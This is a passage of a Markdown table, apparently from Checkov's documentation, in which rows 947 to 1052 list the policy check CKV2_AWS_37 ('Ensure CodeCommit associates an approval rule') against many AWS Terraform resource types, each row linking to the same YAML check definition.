approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 948 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 949 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 950 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 951 | CKV2_AWS_37 | resource | aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 952 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 953 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 954 | CKV2_AWS_37 | resource | 
aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 955 | CKV2_AWS_37 | resource | aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 956 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 957 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 958 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 959 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 960 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 961 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 962 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 963 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 964 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 965 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 966 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 967 | CKV2_AWS_37 | resource | 
aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 968 | CKV2_AWS_37 | resource | aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 969 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 970 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 971 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 972 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 973 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 974 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 975 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 976 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 977 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 978 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 979 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 980 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 981 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 982 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 983 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 984 | CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 985 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 986 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 987 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 988 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 989 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 990 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 991 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 992 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 993 | CKV2_AWS_37 | resource | 
aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 994 | CKV2_AWS_37 | resource | aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 995 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 996 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 997 | CKV2_AWS_37 | resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 998 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 999 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1000 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1001 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1002 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1003 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1004 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1005 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1006 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1007 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1008 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1009 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1010 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1011 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1012 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1013 | CKV2_AWS_37 | resource | 
aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1014 | CKV2_AWS_37 | resource | aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1015 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1016 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1017 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1018 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1019 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1020 
| CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1021 | CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1022 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1023 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1024 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1025 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1026 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1027 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1028 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1029 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1030 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1031 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1032 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1033 | CKV2_AWS_37 | resource | 
aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1034 | CKV2_AWS_37 | resource | aws_dms_replication_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1035 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1036 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1037 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1038 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1039 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1040 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1041 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1042 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1043 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1044 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1045 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1046 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1047 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1048 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1049 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1050 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1051 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1052 | CKV2_AWS_37 | resource | 